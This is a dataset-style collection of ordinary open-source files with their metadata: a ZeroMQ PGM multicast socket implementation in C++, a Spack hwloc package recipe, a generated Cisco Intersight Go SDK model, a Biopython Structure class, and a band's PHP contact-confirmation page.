if (AF_INET6 == sa_family) {
struct sockaddr_in6 sa6;
memcpy (&sa6, &res->ai_recv_addrs[0].gsr_group, sizeof (sa6));
if_req.ir_scope_id = sa6.sin6_scope_id;
}
if (!pgm_bind3 (sock, &addr, sizeof (addr), &if_req, sizeof (if_req),
&if_req, sizeof (if_req), &pgm_error)) {
// Invalid parameters don't set pgm_error_t.
zmq_assert (pgm_error != NULL);
if ((pgm_error->domain == PGM_ERROR_DOMAIN_SOCKET ||
pgm_error->domain == PGM_ERROR_DOMAIN_IF) && (
pgm_error->code != PGM_ERROR_INVAL &&
pgm_error->code != PGM_ERROR_BADF &&
pgm_error->code != PGM_ERROR_FAULT))
// User, host, or network configuration or transient error.
goto err_abort;
// Fatal OpenPGM internal error.
zmq_assert (false);
}
// Join IP multicast groups.
for (unsigned i = 0; i < res->ai_recv_addrs_len; i++) {
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_JOIN_GROUP,
&res->ai_recv_addrs [i], sizeof (struct group_req)))
goto err_abort;
}
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_SEND_GROUP,
&res->ai_send_addrs [0], sizeof (struct group_req)))
goto err_abort;
pgm_freeaddrinfo (res);
res = NULL;
// Set IP level parameters.
{
// Multicast loopback disabled by default
const int multicast_loop = 0;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_MULTICAST_LOOP,
&multicast_loop, sizeof (multicast_loop)))
goto err_abort;
const int multicast_hops = options.multicast_hops;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_MULTICAST_HOPS,
&multicast_hops, sizeof (multicast_hops)))
goto err_abort;
// Expedited Forwarding PHB for network elements, no ECN.
// Ignore return value due to varied runtime support.
const int dscp = 0x2e << 2;
if (AF_INET6 != sa_family)
pgm_setsockopt (sock, IPPROTO_PGM, PGM_TOS,
&dscp, sizeof (dscp));
const int nonblocking = 1;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NOBLOCK,
&nonblocking, sizeof (nonblocking)))
goto err_abort;
}
// Connect PGM transport to start state machine.
if (!pgm_connect (sock, &pgm_error)) {
// Invalid parameters don't set pgm_error_t.
zmq_assert (pgm_error != NULL);
goto err_abort;
}
// For receiver transport preallocate pgm_msgv array.
if (receiver) {
zmq_assert (in_batch_size > 0);
size_t max_tsdu_size = get_max_tsdu_size ();
pgm_msgv_len = (int) in_batch_size / max_tsdu_size;
if ((int) in_batch_size % max_tsdu_size)
pgm_msgv_len++;
zmq_assert (pgm_msgv_len);
pgm_msgv = (pgm_msgv_t*) malloc (sizeof (pgm_msgv_t) * pgm_msgv_len);
alloc_assert (pgm_msgv);
}
return 0;
err_abort:
if (sock != NULL) {
pgm_close (sock, FALSE);
sock = NULL;
}
if (res != NULL) {
pgm_freeaddrinfo (res);
res = NULL;
}
if (pgm_error != NULL) {
pgm_error_free (pgm_error);
pgm_error = NULL;
}
errno = EINVAL;
return -1;
}
zmq::pgm_socket_t::~pgm_socket_t ()
{
if (pgm_msgv)
free (pgm_msgv);
if (sock)
pgm_close (sock, TRUE);
}
// Get receiver fds. receive_fd_ is signaled for incoming packets,
// waiting_pipe_fd_ is signaled for state driven events and data.
void zmq::pgm_socket_t::get_receiver_fds (fd_t *receive_fd_,
fd_t *waiting_pipe_fd_)
{
socklen_t socklen;
bool rc;
zmq_assert (receive_fd_);
zmq_assert (waiting_pipe_fd_);
socklen = sizeof (*receive_fd_);
rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_RECV_SOCK, receive_fd_,
&socklen);
zmq_assert (rc);
zmq_assert (socklen == sizeof (*receive_fd_));
socklen = sizeof (*waiting_pipe_fd_);
rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_PENDING_SOCK, waiting_pipe_fd_,
&socklen);
zmq_assert (rc);
zmq_assert (socklen == sizeof (*waiting_pipe_fd_));
}
// Get fds and store them into user allocated memory.
// send_fd is for non-blocking send wire notifications.
// receive_fd_ is for incoming back-channel protocol packets.
// rdata_notify_fd_ is raised for waiting repair transmissions.
// pending_notify_fd_ is for state driven events.
void zmq::pgm_socket_t::get_sender_fds (fd_t *send_fd_, fd_t *receive_fd_,
fd_t *rdata_notify_fd_, fd_t *pending_notify_fd_)
{
socklen_t socklen;
bool rc;
zmq_assert (send_fd_);
zmq_assert (receive_fd_);
zmq_assert (rdata_notify_fd_);
zmq_assert (pending_notify_fd_);
socklen = sizeof (*send_fd_);
rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_SEND_SOCK, send_fd_, &socklen);
zmq_assert (rc);
zmq_assert (socklen == sizeof (*receive_fd_));
socklen = sizeof (*receive_fd_);
rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_RECV_SOCK, receive_fd_,
&socklen);
zmq_assert (rc);
zmq_assert (socklen == sizeof (*receive_fd_));
socklen = sizeof (*rdata_notify_fd_);
rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_REPAIR_SOCK, rdata_notify_fd_,
&socklen);
zmq_assert (rc);
zmq_assert (socklen == sizeof (*rdata_notify_fd_));
socklen = sizeof (*pending_notify_fd_);
rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_PENDING_SOCK,
pending_notify_fd_, &socklen);
zmq_assert (rc);
zmq_assert (socklen == sizeof (*pending_notify_fd_));
}
// Send one APDU, transmit window owned memory.
// data_len_ must be less than one TPDU.
size_t zmq::pgm_socket_t::send (unsigned char *data_, size_t data_len_)
{
size_t nbytes = 0;
const int status = pgm_send (sock, data_, data_len_, &nbytes);
// We have to write all data as one packet.
if (nbytes > 0) {
zmq_assert (status == PGM_IO_STATUS_NORMAL);
zmq_assert (nbytes == data_len_);
}
else {
zmq_assert (status == PGM_IO_STATUS_RATE_LIMITED ||
status == PGM_IO_STATUS_WOULD_BLOCK);
if (status == PGM_IO_STATUS_RATE_LIMITED)
errno = ENOMEM;
else
errno = EBUSY;
}
// Save return value.
last_tx_status = status;
return nbytes;
}
long zmq::pgm_socket_t::get_rx_timeout ()
{
if (last_rx_status != PGM_IO_STATUS_RATE_LIMITED &&
last_rx_status != PGM_IO_STATUS_TIMER_PENDING)
return -1;
struct timeval tv;
socklen_t optlen = sizeof (tv);
const bool rc = pgm_getsockopt (sock, IPPROTO_PGM,
last_rx_status == PGM_IO_STATUS_RATE_LIMITED ? PGM_RATE_REMAIN :
PGM_TIME_REMAIN, &tv, &optlen);
zmq_assert (rc);
const long timeout = (tv.tv_sec * 1000) + (tv.tv_usec / 1000);
return timeout;
}
long zmq::pgm_socket_t::get_tx_timeout ()
{
if (last_tx_status != PGM_IO_STATUS_RATE_LIMITED)
return -1;
struct timeval tv;
socklen_t optlen = sizeof (tv);
const bool rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_RATE_REMAIN, &tv,
&optlen);
zmq_assert (rc);
const long timeout = (tv.tv_sec * 1000) + (tv.tv_usec / 1000);
return timeout;
}
// Return max TSDU size without fragmentation from current PGM transport.
size_t zmq::pgm_socket_t::get_max_tsdu_size ()
{
int max_tsdu = 0;
socklen_t optlen = sizeof (max_tsdu);
bool rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_MSS, &max_tsdu, &optlen);
zmq_assert (rc);
zmq_assert (optlen == sizeof (max_tsdu));
return (size_t) max_tsdu;
}
// pgm_recvmsgv is called to fill the pgm_msgv array up to pgm_msgv_len.
// In subsequent calls data from pgm_msgv structure are returned.
ssize_t zmq::pgm_socket_t::receive (void **raw_data_, const pgm_tsi_t **tsi_)
{
size_t raw_data_len = 0;
// We just sent all data from pgm_transport_recvmsgv up
// and have to return 0 that another engine in this thread is scheduled.
if (nbytes_rec == nbytes_processed && nbytes_rec > 0) {
// Reset all the counters.
nbytes_rec = 0;
nbytes_processed = 0;
pgm_msgv_processed = 0;
errno = EAGAIN;
return 0;
}
// If we have are going first time or if we have processed all pgm_msgv_t
// structure previously read from the pgm socket.
if (nbytes_rec == nbytes_processed) {
// Check program flow.
zmq_assert (pgm_msgv_processed == 0);
zmq_assert (nbytes_processed == 0);
zmq_assert (nbytes_rec == 0);
// Receive a vector of Application Protocol Domain Unit's (APDUs)
// from the transport.
pgm_error_t *pgm_error = NULL;
const int status = pgm_recvmsgv (sock, pgm_msgv,
pgm_msgv_len, MSG_ERRQUEUE, &nbytes_rec, &pgm_error);
// Invalid parameters.
zmq_assert (status != PGM_IO_STATUS_ERROR);
last_rx_status = status;
// In a case when no ODATA/RDATA fired POLLIN event (SPM...)
// pgm_recvmsg returns PGM_IO_STATUS_TIMER_PENDING.
if (status == PGM_IO_STATUS_TIMER_PENDING) {
zmq_assert (nbytes_rec == 0);
// In case if no RDATA/ODATA caused POLLIN 0 is
// returned.
nbytes_rec = 0;
errno = EBUSY;
return 0;
}
// Send SPMR, NAK, ACK is rate limited.
if (status == PGM_IO_STATUS_RATE_LIMITED) {
zmq_assert (nbytes_rec == 0);
// In case if no RDATA/ODATA caused POLLIN 0 is returned.
nbytes_rec = 0;
errno = ENOMEM;
return 0;
}
// No peers and hence no incoming packets.
if (status == PGM_IO_STATUS_WOULD_BLOCK) {
zmq_assert (nbytes_rec == 0);
// In case if no RDATA/ODATA caused POLLIN 0 is returned.
nbytes_rec = 0;
errno = EAGAIN;
return 0;
}
// Data loss.
if (status == PGM_IO_STATUS_RESET) {
struct pgm_sk_buff_t* skb = pgm_msgv [0].msgv_skb [0];
// Save lost data TSI.
*tsi_ = &skb->tsi;
nbytes_rec = 0;
// In case of dala loss -1 is returned.
errno = EINVAL;
pgm_free_skb (skb);
return -1;
}
zmq_assert (status == PGM_IO_STATUS_NORMAL);
}
else
{
zmq_assert (pgm_msgv_processed <= pgm_msgv_len);
}
// Zero byte payloads are valid in PGM, but not 0MQ protocol.
zmq_assert (nbytes_rec > 0);
// Only one APDU per pgm_msgv_t structure is allowed.
zmq_assert (pgm_msgv [pgm_msgv_processed].msgv_len == 1);
struct pgm_sk_buff_t* skb =
pgm_msgv [pgm_msgv_processed].msgv_skb [0];
// Take pointers from pgm_msgv_t structure.
*raw_data_ = skb->data;
raw_data_len = skb->len;
// Save current TSI.
*tsi_ = &skb->tsi;
// Move the the next pgm_msgv_t structure.
pgm_msgv_processed++;
zmq_assert (pgm_msgv_processed <= pgm_msgv_len);
nbytes_processed +=raw_data_len;
return raw_data_len;
}
void zmq::pgm_socket_t::process_upstream ()
{
pgm_msgv_t dummy_msg;
size_t dummy_bytes = 0;
pgm_error_t *pgm_error = NULL;
const int status = pgm_recvmsgv (sock, &dummy_msg,
1, MSG_ERRQUEUE, &dummy_bytes, &pgm_error);
// Invalid parameters.
zmq_assert (status != PGM_IO_STATUS_ERROR);
// No data should be returned.
zmq_assert (dummy_bytes == 0 && (status == PGM_IO_STATUS_TIMER_PENDING ||
status == PGM_IO_STATUS_RATE_LIMITED ||
status == PGM_IO_STATUS_WOULD_BLOCK));
last_rx_status = status;
if (status == PGM_IO_STATUS_TIMER_PENDING)
errno = EBUSY;
else
if (status == PGM_IO_STATUS_RATE_LIMITED)
errno = ENOMEM;
else
errno = EAGAIN;
}
int zmq::pgm_socket_t::compute_sqns (int tpdu_)
{
// Convert rate into B/ms.
uint64_t rate = uint64_t (options.rate) / 8;
// Compute the size of the buffer in bytes.
uint64_t size = uint64_t (options.recovery_ivl) * rate;
// Translate the size into number of packets.
uint64_t sqns = size / tpdu_;
// Buffer should be able to hold at least one packet.
if (sqns == 0)
sqns = 1;
return (int) sqns;
}
#endif
|
C++
|
Apache-2.0
|
EshaMaharishi/pubsub-1/src/third_party/zeromq-4.0.4/src/pgm_socket.cpp
|
db0400b3-b28f-4790-b84b-b8417024642e
|
[{"tag": "IP_ADDRESS", "value": "224.250.0.1", "start": 1588, "end": 1599, "context": "/ e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%e"}, {"tag": "IP_ADDRESS", "value": "224.250.0.2", "start": 1600, "end": 1611, "context": ";239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint"}, {"tag": "IP_ADDRESS", "value": "224.250.0.3:8000", "start": 1612, "end": 1628, "context": ":7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint zmq::pgm_socket_"}, {"tag": "IP_ADDRESS", "value": "239.192.0.1:7500", "start": 1551, "end": 1567, "context": " & multicast group decls>:<IP port>\n// e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.2"}]
|
[{"tag": "IP_ADDRESS", "value": "224.250.0.1", "start": 1588, "end": 1599, "context": "/ e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%e"}, {"tag": "IP_ADDRESS", "value": "224.250.0.2", "start": 1600, "end": 1611, "context": ";239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint"}, {"tag": "IP_ADDRESS", "value": "224.250.0.3:8000", "start": 1612, "end": 1628, "context": ":7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint zmq::pgm_socket_"}, {"tag": "IP_ADDRESS", "value": "239.192.0.1:7500", "start": 1551, "end": 1567, "context": " & multicast group decls>:<IP port>\n// e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.2"}]
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
class Hwloc(AutotoolsPackage):
"""The Hardware Locality (hwloc) software project.
The Portable Hardware Locality (hwloc) software package
provides a portable abstraction (across OS, versions,
architectures, ...) of the hierarchical topology of modern
architectures, including NUMA memory nodes, sockets, shared
caches, cores and simultaneous multithreading. It also gathers
various system attributes such as cache and memory information
as well as the locality of I/O devices such as network
interfaces, InfiniBand HCAs or GPUs. It primarily aims at
helping applications with gathering information about modern
computing hardware so as to exploit it accordingly and
efficiently.
"""
homepage = "http://www.open-mpi.org/projects/hwloc/"
url = "https://download.open-mpi.org/release/hwloc/v2.0/hwloc-2.0.2.tar.gz"
list_url = "http://www.open-mpi.org/software/hwloc/"
list_depth = 2
git = 'https://github.com/open-mpi/hwloc.git'
version('master', branch='master')
version('2.0.2', sha256='27dcfe42e3fb3422b72ce48b48bf601c0a3e46e850ee72d9bdd17b5863b6e42c')
version('2.0.1', sha256='f1156df22fc2365a31a3dc5f752c53aad49e34a5e22d75ed231cd97eaa437f9d')
version('2.0.0', sha256='a0d425a0fc7c7e3f2c92a272ffaffbd913005556b4443e1887d2e1718d902887')
version('1.11.11', sha256='74329da3be1b25de8e98a712adb28b14e561889244bf3a8138afe91ab18e0b3a')
version('1.11.10', sha256='0a2530b739d9ebf60c4c1e86adb5451a20d9e78f7798cf78d0147cc6df328aac')
version('1.11.9', sha256='85b978995b67db0b1a12dd1a73b09ef3d39f8e3cb09f8b9c60cf04633acce46c')
version('1.11.8', sha256='8af89b1164a330e36d18210360ea9bb305e19f9773d1c882855d261a13054ea8')
version('1.11.7', sha256='ac16bed9cdd3c63bca1fe1ac3de522a1376b1487c4fc85b7b19592e28fd98e26')
version('1.11.6', sha256='67963f15197e6b551539c4ed95a4f8882be9a16cf336300902004361cf89bdee')
version('1.11.5', sha256='da2c780fce9b5440a1a7d1caf78f637feff9181a9d1ca090278cae4bea71b3df')
version('1.11.4', sha256='1b6a58049c31ce36aff162cf4332998fd468486bd08fdfe0249a47437311512d')
version('1.11.3', sha256='03a1cc63f23fed7e17e4d4369a75dc77d5c145111b8578b70e0964a12712dea0')
version('1.11.2', sha256='d11f091ed54c56c325ffca1083113a405fcd8a25d5888af64f5cd6cf587b7b0a')
version('1.11.1', sha256='b41f877d79b6026640943d57ef25311299378450f2995d507a5e633da711be61')
version('1.9', sha256='9fb572daef35a1c8608d1a6232a4a9f56846bab2854c50562dfb9a7be294f4e8')
variant('nvml', default=False, description="Support NVML device discovery")
variant('gl', default=False, description="Support GL device discovery")
variant('cuda', default=False, description="Support CUDA devices")
variant('libxml2', default=True, description="Build with libxml2")
variant('pci', default=(sys.platform != 'darwin'),
description="Support analyzing devices on PCI bus")
variant('shared', default=True, description="Build shared libraries")
variant(
'cairo',
default=False,
description='Enable the Cairo back-end of hwloc\'s lstopo command'
)
depends_on('pkgconfig', type='build')
depends_on('m4', type='build', when='@master')
depends_on('autoconf', type='build', when='@master')
depends_on('automake', type='build', when='@master')
depends_on('libtool', type='build', when='@master')
depends_on('cuda', when='+nvml')
depends_on('cuda', when='+cuda')
depends_on('gl', when='+gl')
depends_on('libpciaccess', when='+pci')
depends_on('libxml2', when='+libxml2')
depends_on('cairo', when='+cairo')
depends_on('numactl', when='@:1.11.11 platform=linux')
def url_for_version(self, version):
return "http://www.open-mpi.org/software/hwloc/v%s/downloads/hwloc-%s.tar.gz" % (version.up_to(2), version)
def configure_args(self):
args = [
# Disable OpenCL, since hwloc might pick up an OpenCL
# library at build time that is then not found at run time
# (Alternatively, we could require OpenCL as dependency.)
"--disable-opencl",
]
if '@2.0.0:' in self.spec:
args.append('--enable-netloc')
args.extend(self.enable_or_disable('cairo'))
args.extend(self.enable_or_disable('nvml'))
args.extend(self.enable_or_disable('gl'))
args.extend(self.enable_or_disable('cuda'))
args.extend(self.enable_or_disable('libxml2'))
args.extend(self.enable_or_disable('pci'))
args.extend(self.enable_or_disable('shared'))
return args
|
Python
|
ECL-2.0
|
CSCfi/spack/var/spack/repos/builtin/packages/hwloc/package.py
|
ef124adb-9324-41ae-add0-9c1eb5453f27
|
[]
|
[]
|
/*
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document.
API version: 1.0.9-4903
Contact: intersight@cisco.com
*/
// Code generated by OpenAPI Generator (https://openapi-generator.tech); DO NOT EDIT.
package intersight
import (
"encoding/json"
"reflect"
"strings"
)
// OnpremUpgradeNote UpgradeNote managed object contains the description of one feature/bug fix.
type OnpremUpgradeNote struct {
MoBaseComplexType
// The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data.
ClassId string `json:"ClassId"`
// The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property.
ObjectType string `json:"ObjectType"`
// The change description, such as explanations of a new feature or defect resolution.
Message *string `json:"Message,omitempty"`
AdditionalProperties map[string]interface{}
}
type _OnpremUpgradeNote OnpremUpgradeNote
// NewOnpremUpgradeNote instantiates a new OnpremUpgradeNote object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewOnpremUpgradeNote(classId string, objectType string) *OnpremUpgradeNote {
this := OnpremUpgradeNote{}
this.ClassId = classId
this.ObjectType = objectType
return &this
}
// NewOnpremUpgradeNoteWithDefaults instantiates a new OnpremUpgradeNote object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewOnpremUpgradeNoteWithDefaults() *OnpremUpgradeNote {
this := OnpremUpgradeNote{}
var classId string = "onprem.UpgradeNote"
this.ClassId = classId
var objectType string = "onprem.UpgradeNote"
this.ObjectType = objectType
return &this
}
// GetClassId returns the ClassId field value
func (o *OnpremUpgradeNote) GetClassId() string {
if o == nil {
var ret string
return ret
}
return o.ClassId
}
// GetClassIdOk returns a tuple with the ClassId field value
// and a boolean to check if the value has been set.
func (o *OnpremUpgradeNote) GetClassIdOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.ClassId, true
}
// SetClassId sets field value
func (o *OnpremUpgradeNote) SetClassId(v string) {
o.ClassId = v
}
// GetObjectType returns the ObjectType field value
func (o *OnpremUpgradeNote) GetObjectType() string {
if o == nil {
var ret string
return ret
}
return o.ObjectType
}
// GetObjectTypeOk returns a tuple with the ObjectType field value
// and a boolean to check if the value has been set.
func (o *OnpremUpgradeNote) GetObjectTypeOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.ObjectType, true
}
// SetObjectType sets field value
func (o *OnpremUpgradeNote) SetObjectType(v string) {
o.ObjectType = v
}
// GetMessage returns the Message field value if set, zero value otherwise.
func (o *OnpremUpgradeNote) GetMessage() string {
if o == nil || o.Message == nil {
var ret string
return ret
}
return *o.Message
}
// GetMessageOk returns a tuple with the Message field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *OnpremUpgradeNote) GetMessageOk() (*string, bool) {
if o == nil || o.Message == nil {
return nil, false
}
return o.Message, true
}
// HasMessage returns a boolean if a field has been set.
func (o *OnpremUpgradeNote) HasMessage() bool {
if o != nil && o.Message != nil {
return true
}
return false
}
// SetMessage gets a reference to the given string and assigns it to the Message field.
func (o *OnpremUpgradeNote) SetMessage(v string) {
o.Message = &v
}
func (o OnpremUpgradeNote) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
serializedMoBaseComplexType, errMoBaseComplexType := json.Marshal(o.MoBaseComplexType)
if errMoBaseComplexType != nil {
return []byte{}, errMoBaseComplexType
}
errMoBaseComplexType = json.Unmarshal([]byte(serializedMoBaseComplexType), &toSerialize)
if errMoBaseComplexType != nil {
return []byte{}, errMoBaseComplexType
}
if true {
toSerialize["ClassId"] = o.ClassId
}
if true {
toSerialize["ObjectType"] = o.ObjectType
}
if o.Message != nil {
toSerialize["Message"] = o.Message
}
for key, value := range o.AdditionalProperties {
toSerialize[key] = value
}
return json.Marshal(toSerialize)
}
func (o *OnpremUpgradeNote) UnmarshalJSON(bytes []byte) (err error) {
type OnpremUpgradeNoteWithoutEmbeddedStruct struct {
// The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data.
ClassId string `json:"ClassId"`
// The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property.
ObjectType string `json:"ObjectType"`
// The change description, such as explanations of a new feature or defect resolution.
Message *string `json:"Message,omitempty"`
}
varOnpremUpgradeNoteWithoutEmbeddedStruct := OnpremUpgradeNoteWithoutEmbeddedStruct{}
err = json.Unmarshal(bytes, &varOnpremUpgradeNoteWithoutEmbeddedStruct)
if err == nil {
varOnpremUpgradeNote := _OnpremUpgradeNote{}
varOnpremUpgradeNote.ClassId = varOnpremUpgradeNoteWithoutEmbeddedStruct.ClassId
varOnpremUpgradeNote.ObjectType = varOnpremUpgradeNoteWithoutEmbeddedStruct.ObjectType
varOnpremUpgradeNote.Message = varOnpremUpgradeNoteWithoutEmbeddedStruct.Message
*o = OnpremUpgradeNote(varOnpremUpgradeNote)
} else {
return err
}
varOnpremUpgradeNote := _OnpremUpgradeNote{}
err = json.Unmarshal(bytes, &varOnpremUpgradeNote)
if err == nil {
o.MoBaseComplexType = varOnpremUpgradeNote.MoBaseComplexType
} else {
return err
}
additionalProperties := make(map[string]interface{})
if err = json.Unmarshal(bytes, &additionalProperties); err == nil {
delete(additionalProperties, "ClassId")
delete(additionalProperties, "ObjectType")
delete(additionalProperties, "Message")
// remove fields from embedded structs
reflectMoBaseComplexType := reflect.ValueOf(o.MoBaseComplexType)
for i := 0; i < reflectMoBaseComplexType.Type().NumField(); i++ {
t := reflectMoBaseComplexType.Type().Field(i)
if jsonTag := t.Tag.Get("json"); jsonTag != "" {
fieldName := ""
if commaIdx := strings.Index(jsonTag, ","); commaIdx > 0 {
fieldName = jsonTag[:commaIdx]
} else {
fieldName = jsonTag
}
if fieldName != "AdditionalProperties" {
delete(additionalProperties, fieldName)
}
}
}
o.AdditionalProperties = additionalProperties
}
return err
}
type NullableOnpremUpgradeNote struct {
value *OnpremUpgradeNote
isSet bool
}
func (v NullableOnpremUpgradeNote) Get() *OnpremUpgradeNote {
return v.value
}
func (v *NullableOnpremUpgradeNote) Set(val *OnpremUpgradeNote) {
v.value = val
v.isSet = true
}
func (v NullableOnpremUpgradeNote) IsSet() bool {
return v.isSet
}
func (v *NullableOnpremUpgradeNote) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableOnpremUpgradeNote(val *OnpremUpgradeNote) *NullableOnpremUpgradeNote {
return &NullableOnpremUpgradeNote{value: val, isSet: true}
}
func (v NullableOnpremUpgradeNote) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableOnpremUpgradeNote) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
}
|
GO
|
MPL-2.0
|
sanjnaik/demo/intersight_gosdk/model_onprem_upgrade_note.go
|
35c39a33-3e42-4dee-b08a-123c7a1440f8
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1716, "end": 1736, "context": "enAPI document.\n\nAPI version: 1.0.9-4903\nContact: intersight@cisco.com\n*/\n\n// Code generated by OpenAPI Generator (https"}]
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1716, "end": 1736, "context": "enAPI document.\n\nAPI version: 1.0.9-4903\nContact: intersight@cisco.com\n*/\n\n// Code generated by OpenAPI Generator (https"}]
|
# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""The structure class, representing a macromolecular structure."""
from Bio.PDB.Entity import Entity
from Bio.PDB.internal_coords import IC_Chain
class Structure(Entity):
"""The Structure class contains a collection of Model instances."""
def __init__(self, id):
"""Initialize the class."""
self.level = "S"
Entity.__init__(self, id)
def __repr__(self):
"""Return the structure identifier."""
return "<Structure id=%s>" % self.get_id()
def get_models(self):
"""Return models."""
yield from self
def get_chains(self):
"""Return chains from models."""
for m in self.get_models():
yield from m
def get_residues(self):
"""Return residues from chains."""
for c in self.get_chains():
yield from c
def get_atoms(self):
"""Return atoms from residue."""
for r in self.get_residues():
yield from r
def atom_to_internal_coordinates(self, verbose: bool = False) -> None:
"""Create/update internal coordinates from Atom X,Y,Z coordinates.
Internal coordinates are bond length, angle and dihedral angles.
:param verbose bool: default False
describe runtime problems
"""
for chn in self.get_chains():
chn.atom_to_internal_coordinates(verbose)
def internal_to_atom_coordinates(self, verbose: bool = False) -> None:
"""Create/update atom coordinates from internal coordinates.
:param verbose bool: default False
describe runtime problems
:raises Exception: if any chain does not have .pic attribute
"""
for chn in self.get_chains():
chn.internal_to_atom_coordinates(verbose)
|
Python
|
BSD-3-Clause
|
AaronLi/biopython/Bio/PDB/Structure.py
|
1abf959c-32ed-4438-b868-3363e9a2cd82
|
[{"tag": "EMAIL", "value": "thamelry@binf.ku.dk", "start": 40, "end": 59, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of the Biopython distribut"}, {"tag": "NAME", "value": "Thomas Hamelryck", "start": 22, "end": 38, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of th"}]
|
[{"tag": "EMAIL", "value": "thamelry@binf.ku.dk", "start": 40, "end": 59, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of the Biopython distribut"}, {"tag": "NAME", "value": "Thomas Hamelryck", "start": 22, "end": 38, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of th"}]
|
<?php
# Variables
$page = 'contact';
?>
<!DOCTYPE html>
<html lang=en>
<head>
<?php
ob_start();
include( "includes/head.php" );
$buffer = ob_get_contents();
ob_end_clean();
$buffer = str_replace( "%TITLE%", "Cool City Band - Contact", $buffer );
echo $buffer;
?>
<meta name="description" content="">
</head>
<body>
<!-- Navigation -->
<?php include ('includes/navigation.php') ?>
<section class="section1">
<div class="container" style="min-height:900px">
<div class="row">
<div class="col-lg-12">
<h1 class="page-header">Contact Us </h1>
</div>
</div>
<div class="row section-content">
<div class="col-md-8">
<p class="lead"> Thank You!
Your message has been sent, we'll be in touch shortly. </p>
</div>
<div class="col-md-4">
<h3>Leader/Conductor/Pianist</h3>
<p><strong>Roy Geesa</strong></p>
<p><i class="fa fa-phone"></i> 317-529-3640 (text/voice)</p>
<p><i class="fa fa-envelope-o"></i> <a href="mailto:roygeesa@gmail.com">roygeesa@gmail.com</a> </p>
<ul class="list-unstyled list-inline list-social-icons">
<li> <a href="https://www.facebook.com/Cool-City-Band-149866258393477/?fref=ts" target="_blank"><i class="fa fa-facebook-square fa-2x"></i></a> </li>
</ul>
</div>
</div>
<!-- /.row -->
</div>
</section>
<?php include ('includes/stayintouch.php') ?>
<?php include ('includes/footer.php') ?>
<!-- /.container -->
<?php include ('includes/scripts.php') ?>
</body>
</html>
|
PHP
|
Apache-2.0
|
thrclark/coolcity/contact-confirm.php
|
0910a7bc-f053-4ac8-aebb-0651b19ba1ac
|
